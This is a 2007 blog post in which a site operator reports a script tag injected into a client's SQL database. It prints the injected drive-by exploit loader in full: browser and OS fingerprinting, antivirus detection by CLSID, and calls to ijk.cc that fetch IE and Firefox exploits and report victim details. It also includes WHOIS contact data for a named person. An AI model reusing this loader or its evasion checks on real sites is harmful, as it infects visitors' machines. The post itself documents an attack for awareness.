Tuesday, August 07, 2007

Hackers Injecting Script tags into SQL data fields

Recently, on one of my clients sites, I noticed that some hacker scum had placed a script tag on some of the pages of the site by hacking into the SQL database and inserting the said script tag into a data field. This means that when the page is loaded, the script is also loaded.

The location of the script that is referred to is:


The whois information for ijk.cc is:


robert kuphal
102 Greer Drive
Brunswick, GA 31520
Email: phu59@aol.com

Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: ijk.cc

Created on..............: Fri, Oct 27, 2006
Expires on..............: Sat, Oct 27, 2007
Record last updated on..: Sun, Dec 24, 2006

Administrative Contact:

Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
Phone: +1.9418279024
Email: phu59@aol.com

Technical Contact:

Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
Phone: +1.9418279024
Email: phu59@aol.com

DNS Servers:


The actual script that is at this locations is as follows:

// build: Fri Dec 29 07:37:24 2006

var debug=0;
var test_mode=0;
var cookie_name="userid1";
var cookie_value="11"; // increment it after each exploits update
var server_addr="ijk.cc";
var av_num_errs = 0, av_num_ready = 0, av_finished = 0;
var user_agent = "";
var os_version = 0;
var ie_version = 0, ie_build = 0, wmp_build = 0, av_id = 0;
var system_id = "none";

function print_dbg(str)

if (debug) {

function dbg_alert(str)
if (debug) {

function GetCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
if (!dc) {
print_dbg("Cookies not set!");
return null;

var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) {
print_dbg(prefix + " not found in cookie");
return null;

} else {
begin += 2;

var end = document.cookie.indexOf(";", begin);
if (end == -1) {
end = dc.length;
return unescape(dc.substring(begin + prefix.length, end));
function SetCookie(name, value, domain) {
var exp = new Date();
var two_years = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);

var curCookie = name + "=" + escape(value) + "; expires=" + exp.toGMTString();
document.cookie = curCookie;
print_dbg("Cookie ["+curCookie+"] set ok");

function GetUserAgent()
if (navigator.userAgent.indexOf("Opera") == -1 &&
navigator.userAgent.indexOf("Firefox") == -1 &&
navigator.userAgent.indexOf("MSIE") != -1 &&
navigator.userAgent.indexOf("Windows") != -1) {
return "ie";

if (navigator.userAgent.indexOf("Firefox") != -1) {
return "firefox";


if (navigator.userAgent.indexOf("Opera") != -1) {
return "opera";


return "unknown";


function GetIEBuild()


var fa, full_ver;

var ver_num;

oClientCaps = document.createElement("DIV");

oClientCaps.id = "oClientCaps";



full_ver = oClientCaps.getComponentVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");

fa = full_ver.split(",");

build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);

return build_num;


function GetIEVersion()


var fa, full_ver;

var ver_num;

full_ver = oClientCaps.getComponentVersion ("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");

fa = full_ver.split(",");

ver_num = parseInt(fa[0]) * 100 + parseInt(fa[1]);

return ver_num;


function GetWMPBuild()


var fa;

if (!oClientCaps.isComponentInstalled("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}", "ComponentID")) {

print_dbg("WMP not installed");

return 0;


full_ver = oClientCaps.getComponentVersion ("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}","componentid");

fa = full_ver.split(",");

build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);

print_dbg(fa[0]+"."+fa[1]+"."+fa[2]+"."+ fa[3]);

return build_num;


function GetFirefoxVersion()


var found_ar, fa;

var ver_str = "", ver_num = 0;

re = /\sFirefox\/([\d\.]+)\b/;

found_ar = re.exec(navigator.userAgent);

if (!found_ar) {

print_dbg("regexp failed");

return 0;


fa = found_ar[1].split(".");

ver_num = (parseInt(fa[0]) * 1000000) + (parseInt(fa[1]) * 10000);

if (fa.length > 2) {

ver_num += parseInt(fa[2]) * 100;


if (fa.length > 3) {

ver_num += parseInt(fa[3]);


print_dbg("Firefox version: [" + ver_num + "]");

return ver_num;


function GetOSVersion()


var found_ar;

var os_ver = 0;

re = /Windows\sNT\s(\d)\.(\d)/;

found_ar = re.exec(navigator.userAgent);

if (!found_ar) {

return 0;


os_ver = parseInt(found_ar[1]) * 10 + parseInt(found_ar[2]);

//print_dbg("OS Version: [" + os_ver + "]");

return os_ver;


function ExecScript(script_src)


var st = document.getElementById('script1');

st.src = script_src;

return true;


function ExecIframe(iframe_src)


var iframe = document.getElementById('iframe1');

iframe.src = iframe_src;

return true;


///// EXPS


function exp_iscomponentinstalled()


print_dbg("Loading exp_iscomponentinstalled() for SP0");

if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;


ExecScript("http://" + server_addr + "/E/isci/isci_my.js");


// Firefox compareto


function exp_ff104()


print_dbg("Loading exp_ff104()");

if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;


ExecScript("http://" + server_addr + "/E/ff104/ff104.js");


// Firefox navigator java


function exp_ff154()


print_dbg("Loading exp_ff154()");

if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;


ExecScript("http://" + server_addr + "/E/ff154/ff154.js");


// Windows 2000, IE 5.x


function exp_ms06_044()


print_dbg("Loading exp_ms06_044()");

if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;


var my_src = 'http://'+server_addr+'/E/ms06044/ww.js';

// var my_src = "ww.js"

var url = 'res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript%20language%3D%27jscript%27%20src%3D%27'+my_src+'%27%3E3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';

document.location = url;

// ExecIframe('http://'+server_addr+'/E/ms06044/ms06044.htm');


function exp_vml()


print_dbg("Loading vml_exp()");

if (test_mode) {

dbg_alert("Exploit not loaded: test mode");

return true;




/////////// End of EXPS /////////////////


function NotifyServerStart()


url = "http://"+server_addr+"/cgi-bin/jl/jloader.pl?source="+


if (user_agent == "ie") {

url = url+"&iebuild="+ie_build+"&wmpbuild="+wmp_build+"&av_id="+av_id;


print_dbg("===>>> notify: user_agent=["+user_agent+"] url=["+url+"]");

try {

var sl = document.getElementById('serv_note_link');

sl.src = url;

// serv_note_link.src = url;

} catch (e) {

print_dbg("Cannot find element id=serv_note_link");



progs=['NAVCfgWizDll.NAVCfgWizMgr', // 1 NAV

'McGDMgr.DwnldGroupMgr']; // 2 McAfee

cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4', // 3 trendmicro

'091EB208-39DD-417D-A5DD-7E2C2D8FB9CB', // 4 Windows Defender

'D653647D-D607-4DF6-A5B8-48D2BA195F7B', // 5 BitDefender Antivirus

'9F97547E-4609-42C5-AE0C-81C61FFAEBC3', // 6 AVG7

'65756541-C65C-11CD-0000-4B656E696100', // 7 Panda Antivirus

'1474F601-9B4B-4EB0-81FA-20F753C0E1A4', // 8 F-Prot

'D5507020-DB45-11d1-A5F0-00600872F78D', // 9 Norman Virus Control

'DD230880-495A-11D1-B064-008048EC2FC5', // 10 Kaspersky

'B089FE88-FB52-11D3-BDF1-0050DA34150D', // 11 Nod32

'472083B0-C522-11CF-8763-00608CC02F24', // 12 Avast

'45AC2688-0253-4ED8-97DE-B5370FA7D48A', // 13 Antivir

'8934FCEF-F5B8-468F-951F-78A921CD3920', // 14 Ewido

'1EB2409C-6E28-4066-9738-97A1B8F5639C', // 15 ??

'E7593602-124B-47C9-9F73-A69308EDC973', // 16 Dr Web

'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32

function av_err_event(i) {


cids[i] = null;


function av_ready_event(i) {

var str = "ready: "+cids[i];


if (av_finished) {



if (cids[i] != null) {

var str = "av_redy_event(): Antivirus found: "+cids[i]+"!";

av_id = progs.length + i + 1;

av_finished = 1;

dbg_alert("av_redy_event(): Antivirus found: "+cids[i]+"!");

// jl_main2();



// Return:

// 1 - antivirus found

// 0 - operation in progress


function StartCheckAV()


var txt = "";

try {

var num_errs = 0;

print_dbg("Start check progs...");

for (i = 0; i < progs.length && !av_id; i++) {

try {

print_dbg("Checking "+progs[i]+"...");

new ActiveXObject(progs[i]);

print_dbg("Antivirus installed: " + progs[i]);

av_id = i + 1;

av_finished = 1;


catch (e) {};


if (av_id) {

print_dbg("Antivirus detected av_id="+av_id+" (progs)!");

return 1;


print_dbg("Start check antivirus CLSIDs");

for (i = 0; i < cids.length; i++) {

print_dbg("Creating "+cids[i]+"...");

txt += '<'+'/object>';


document.createElement('div').innerHTML = txt;

} catch (e) {};

if (av_id) {

print_dbg("Antivirus detected av_id="+av_id+"(cids, before callbacks)!");

return 1;


return 0;


function jl_main()


// dbg_alert("jl_main() started!");

if (!debug) {

try {

if (GetCookie(cookie_name) == cookie_value) {

print_dbg("Est kuka!");

return false;


SetCookie(cookie_name, cookie_value);

} catch (e) {};


// Get OS and browser versions


os_version = GetOSVersion();

user_agent = GetUserAgent();

// document.writeln("[Photo]");

var tmp_img = document.createElement("IMG");

tmp_img.id = "serv_note_link";

tmp_img.width = 0;

tmp_img.height = 0;

tmp_img.border = 0;

tmp_img.frameborder = 0;

tmp_img.src = "about:blank";


var iframe1 = document.createElement("IFRAME");

iframe1.id = "iframe1";

iframe1.border = 0;

iframe1.frameborder = 0;

iframe1.width = 0;

iframe1.height = 0;


// document.writeln("");

var script1 = document.createElement("SCRIPT");

script1.id = "script1";


// document.writeln("");

print_dbg("OS Version: NT " + os_version);

print_dbg("Browser: " + user_agent);

// Internet Explorer


if (user_agent == "ie") {

// Must do GetIEBuild() first!


ie_build = GetIEBuild();

ie_version = GetIEVersion();

wmp_build = GetWMPBuild();

print_dbg("IE version: [" + ie_version + "]");

print_dbg("IE build: [" + ie_build + "]");

print_dbg("WMP build: [" + wmp_build + "]");

// IE 7.x


if (ie_version >= 700) {

system_id = "ie7";

} else if (ie_version >= 600) {

// IE 6.x


print_dbg("IE " + ie_version + " ");

if (os_version == 50) {

// Windows 2000


print_dbg("Win 2000 IE6");

system_id = "ie6_2k";

} else if (os_version == 51) {

// Windows XP


if (ie_build >= 60029002180) {

print_dbg("Win XP SP2");

system_id = "ie6_xpsp2";

} else if (ie_build >= 60028001106) {

print_dbg("Win XP SP1");

system_id = "ie6_xpsp1";

} else if (ie_build == 60026000000) {

print_dbg("Win XP SP0");

system_id = "ie6_xpsp0";

} else {

system_id = "ie6_xp";

print_dbg("Win XP SP unknown: " + ie_build);


} else {

// TODO: Support for 98, NT, Win2003, Vista


print_dbg("Win unsupported " + os_version);

system_id = "ie6_unknown";


} else if (ie_version < 600) {

// IE 5.x


print_dbg("IE " + ie_version + " ");

if (os_version == 50) {

// MSIE 5, Windows 2000


print_dbg("Win 2000");

system_id = "ie5_2k";

} else if (os_version < 50) {

print_dbg("Win NT " + os_version);

system_id = "ie5_nt";





// Mozilla Firefox


if (user_agent == "firefox" && os_version != 0) {

var firefox_version = 0;

firefox_version = GetFirefoxVersion();

// Version <= 1.0.4

if (firefox_version <= 1000400) {

system_id = "ff104";


// 1.0.4 < Version <

if (firefox_version > 1000400 && firefox_version <= 1050004) {

system_id = "ff150";





function set_window_status(stat_str)


window.status = stat_str;


function jl_main2()


av_finished = 1;

// print_dbg("av_on="+av_on);


set_window_status("Opening "+window.location.href+"...");

setTimeout("set_window_status('Done')", 5000);

print_dbg("system_id: "+system_id+" av_id="+av_id+" user_agent="+user_agent);

switch (system_id) {

case "ie7":

case "ie6_xp":

case "ie6_unknown":

case "ie6_xpsp2":



case "ie6_xpsp1":



case "ie6_xpsp0":



case "ie6_2k":



case "ie5_2k":



case "ie5_nt":


case "ff104":



case "ff150":






// setTimeout('NotifyServerFinish()', 2000);



// Run main function only after dom loaded

/* for Mozilla */

if (document.addEventListener) {

document.addEventListener("DOMContentLoaded", jl_main, false);

} else {

// IE



I will be giving Mr Robert Kuphal of Brunswick, Georgia, USA a call to ask him why a link to a script hosted on his domain has been illegally inserted into the SQL database of the site.